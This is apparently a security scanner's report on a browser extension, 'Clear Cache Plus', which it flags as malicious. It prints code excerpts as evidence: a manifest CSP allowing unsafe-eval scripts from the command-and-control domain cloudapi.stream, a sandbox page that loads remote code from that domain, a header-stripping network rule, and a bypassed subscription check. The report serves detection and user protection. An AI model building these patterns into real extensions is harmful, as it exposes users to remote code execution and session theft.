Clear Cache Plus

Clear Cache Plus

ID: bgdkbjcdecedfoejdfgeafdodjgfohno

Supported Languages

🇺🇸English

Extension Info & Metadata

Status
Active
Version
1.1.2-build.4
Size
N/A
Rating
0.0/5
Reviews
0
Users
16
Type
Extension
Updated
Sep 22, 2025
Category
Developer tools
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
Yes

Publisher Contextual Analysis

Trusted
Author
https://top.rodeo/View Profile
Country
DE
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
Yes
Mailbox exists
Yes
Address
Ringelsweide 28 Düsseldorf 40223 DE
Website
Visit
Total Extensions
72
Active
42
Obsolete
30
Listed
72
Unlisted
0
Total Users
6,850
Screenshot 1
Screenshot 2
Screenshot 3

Effortless, intuitive browser data control—right from your toolbar.

Streamlined, user-friendly browser data management—right from your toolbar. ♻️ Instantly clear cache and browsing data with one click ♻️ Full control over what gets removed ♻️ Built by an independent developer focused on privacy & performance Key Features: ✅ One-click cache & data clearing ✅ Choose specific domains to clear ✅ Clear data from active tab only ✅ Select custom time ranges ✅ Sync settings across devices ✅ Automate scheduled clearing ✅ Remove web, app, & extension data ✅ Import browser settings seamlessly ✅ Dark & light mode support ✅ Sleek, redesigned interface

Item
Type
Severity
Description
declarativeNetRequestWithHostAccess
Permission
Critical
This permission combines network request modification with host permissions. Rated Critical because it can modify requests for specific domains, potentially targeting sensitive websites with precise attack rules.
browsingData
Permission
High
This permission clears browsing data, history, and redis. Rated High because it can destroy evidence of malicious activity, clear security logs, and modify browser state.
offscreen
Permission
High
This permission creates hidden browser documents with full DOM access. Rated High because it can run background operations invisibly, potentially executing malicious code without user awareness.
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.
storage
Permission
Medium
This permission allows storing data locally in the browser. Rated Medium because it can persist sensitive user data, track user activities over time, and potentially store malicious payloads.
alarms
Permission
Low
This permission schedules periodic tasks. Rated Low because it can only trigger events at specified times without access to sensitive data.

`cloudapi.stream` is the extension's declared API base URL, AWS API Gateway endpoint, and website URL. This domain is explicitly named in two IoC records (MalExt Sentry v1.0 and Socket 108-chrome-ext C2 campaign) as the shared command-and-control infrastructure for a data-exfiltration and session-theft campaign spanning 108 extensions. All Cognito authentication tokens and subscription API calls flow to this domain.

assets/index.esm-DBQD-6dI.js (Line 1)
const R = {  BASE_URL: "/",  DEV: !1,  MODE: "release",  PROD: !0,  SSR: !1,  VITE_API_NAME: "prod-clear-cache-Api",  VITE_API_URL: "https://cloudapi.stream",  VITE_CHECKOUT_DOMAIN: "paddle.com",  VITE_CHECKOUT_ORIGIN: "https://*.paddle.com/",  VITE_CHECKOUT_URL: "https://cloudapi.stream/checkout/index.html",  VITE_CUSTOMER_ID_ATTR_NAME: "custom:customerId",  VITE_EXTENSION_HOST: "",  VITE_EXTENSION_PORT: "",  VITE_IDENTITY_POOL_ID: "us-east-1:3eb0088c-5f55-4e61-bde5-650f67bec1bd",  ...  VITE_WEBSITE_URL: "https://cloudapi.stream"}

The manifest's sandbox CSP explicitly whitelists `cloudapi.stream` as a trusted script source with `unsafe-eval` enabled, allowing the C2 domain to serve and execute arbitrary JavaScript inside the extension's sandbox context. Legitimate payment processors do not require script execution permissions from a third-party domain that is not the payment processor itself (Paddle is separately listed). This grants the C2 unrestricted script execution capability within the sandbox.

manifest.json (Line 29)
{  "sandbox": [    "sandbox allow-scripts allow-forms allow-popups allow-modals",    "script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.paddle.com https://buy.paddle.com https://cloudapi.stream/checkout/index.html",    "script-src-elem 'self' 'unsafe-inline' 'unsafe-eval' https://cdn.paddle.com https://buy.paddle.com https://cloudapi.stream/checkout/index.html",    "child-src 'self' https://cloudapi.stream/checkout/index.html https://buy.paddle.com",    "frame-src https://cloudapi.stream/checkout/index.html https://buy.paddle.com"  ]}

The sandbox page unconditionally navigates to `cloudapi.stream/checkout/index.html` (the value of `o.resources.checkoutUrl` as defined in index.esm-DBQD-6dI.js). This fetches and executes remotely-hosted code from the known C2 domain on every sandbox load. Because the CSP grants `unsafe-eval` to this origin, the remotely loaded page can dynamically construct and execute arbitrary code.

assets/sandbox-BK1e-51W.js (Line 9)
r.info(c.magenta(`Sandbox: Loading checkout url: ${o.resources.checkoutUrl}`)), window.location.href = o.resources  .checkoutUrl;

All four subscription validation checks have been deliberately commented out and replaced with numbered `console.log` debug stubs. The function unconditionally returns `true`, meaning every user is treated as an active subscriber regardless of payment status. This is not obfuscation or a minifier artifact — the leftover numbered console.log stubs are characteristic of active manual tampering. Bypassing subscription gating is consistent with trojanized extensions that attract users with free premium access while running covert C2 operations.

assets/Scheduler-ITpj7yeF.js (Line 12993)
g(this, "isSubscribed", (t = !0) => {  try {    const r = Ku.getInstance(),      i = r.getCustomerId(),      n = d(this, We),      s = d(this, ce);    console.log(s);    console.log("1");    //if (!r.isLoggedIn() || !i || !n || !s) return (d(this, We) || d(this, ce)) && D.debug(z.yellow("Invalidating subscription..."), d(this, We), d(this, ce)), $(this, ce, void 0), $(this, We, void 0), !1;    console.log("2");    //if (!n.status) throw new Error((n == null ? void 0 : n.error) || "Validation request has no status");    console.log("3");    //if (s.customerId !== i) throw new Error((n == null ? void 0 : n.error) || "Customer ID mismatch");    console.log("4");    //if (s.status !== "active" && s.status !== "trialing") throw new Error(...);    console.log("5");    return !0  } catch (r) {    if (!t) throw D.debug("Could not validate subscription:", (r == null ? void 0 : r.message) || r), r;    return !1  }});

During the checkout flow the extension applies a `declarativeNetRequest` session rule that strips `Cookie`, `X-Frame-Options`, `Frame-Options`, and `Content-Security-Policy` response headers from all main and sub frames in its own tab contexts. Stripping CSP and framing headers from responses is used to allow the `cloudapi.stream` checkout iframe to load without browser-enforced content restrictions, removing a layer of security isolation that would otherwise prevent cross-origin framing and script injection by the C2 page.

assets/Scheduler-ITpj7yeF.js (Line 12840)
responseHeaders: [{    header: "Cookie",    operation: "remove"  }, {    header: "X-Frame-Options",    operation: "remove"  }, {    header: "Frame-Options",    operation: "remove"  }, {    header: "Content-Security-Policy",    operation: "remove"  }]  ...  condition: {    resourceTypes: ["main_frame", "sub_frame"],    tabIds: u  }

By severity

Critical4
High1
Medium0
Low0

Versions scanned

Showing 1 of 2 scanned versions with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
1.1.2-build.45

Files with findings

4 distinct paths — top paths by unique finding count:

  • assets/Scheduler-ITpj7yeF.js2
  • assets/index.esm-DBQD-6dI.js1
  • assets/sandbox-BK1e-51W.js1
  • manifest.json1
S.No.
Category
Severity
File
Summary
Found in Version
1Data Exfiltration
critical
assets/index.esm-DBQD-6dI.js (line 1)`cloudapi.stream` is the extension's declared API base URL, AWS API Gateway endpoint, and website URL. This domain is explicitly named in two IoC records (MalExt Sentry v1.0 and Socket 108-chrome-ext C2 campaign) as t…
2Other
critical
assets/Scheduler-ITpj7yeF.js (line 12993)All four subscription validation checks have been deliberately commented out and replaced with numbered `console.log` debug stubs. The function unconditionally returns `true`, meaning every user is treated as an activ…
3Remote Code Loading
critical
manifest.json (line 29)The manifest's sandbox CSP explicitly whitelists `cloudapi.stream` as a trusted script source with `unsafe-eval` enabled, allowing the C2 domain to serve and execute arbitrary JavaScript inside the extension's sandbox…
4Remote Code Loading
critical
assets/sandbox-BK1e-51W.js (line 9)The sandbox page unconditionally navigates to `cloudapi.stream/checkout/index.html` (the value of `o.resources.checkoutUrl` as defined in index.esm-DBQD-6dI.js). This fetches and executes remotely-hosted code from the…
5Network Interception
high
assets/Scheduler-ITpj7yeF.js (line 12840)During the checkout flow the extension applies a `declarativeNetRequest` session rule that strips `Cookie`, `X-Frame-Options`, `Frame-Options`, and `Content-Security-Policy` response headers from all main and sub fram…
URLs
55
IPv4
3
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

cloudapi.stream-https://cloudapi.stream
*.paddle.com-https://*.paddle.com/
cloudapi.stream/checkout/index.htmlhttps://cloudapi.stream/checkout/index.html
api.paddle.com-https://api.paddle.com
cloudapi.stream/privacyhttps://cloudapi.stream/privacy
cloudapi.stream/termshttps://cloudapi.stream/terms
cloudapi.stream/supporthttps://cloudapi.stream/support
chromewebstore.google.com/detail/clear-cache/cppjkneekbjaeellbfkmgnhonkkjfpdnhttps://chromewebstore.google.com/detail/clear-cache/cppjkneekbjaeellbfkmgnhonkkjfpdn
chromewebstore.google.com/detail/clear-cache/cppjkneekbjaeellbfkmgnhonkkjfpdn/reviewshttps://chromewebstore.google.com/detail/clear-cache/cppjkneekbjaeellbfkmgnhonkkjfpdn/reviews
buymeacoffee.com/benjaminbojkohttps://buymeacoffee.com/benjaminbojko
Showing 1 to 10 of 60 rows
Rows per page:

Gain full insight into all external connections.

Upgrade for full visibility.

0.0.0.0
IPv4
-
1.5.75.75
IPv4
-
1.1.2.4
IPv4
-
Version
Size
Is Malicious
Findings
Permhash
1.1.2.4
Latest
N/A
Malicious
1.1.2-build.4
0.64 MB
Malicious
5
Showing 1 to 2 of 10 rows
Rows per page:

Code Diff

Compare extension code between any two versions.

0 changed files (scanned top 25 shared text files)

No comparable text files found between these versions.

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.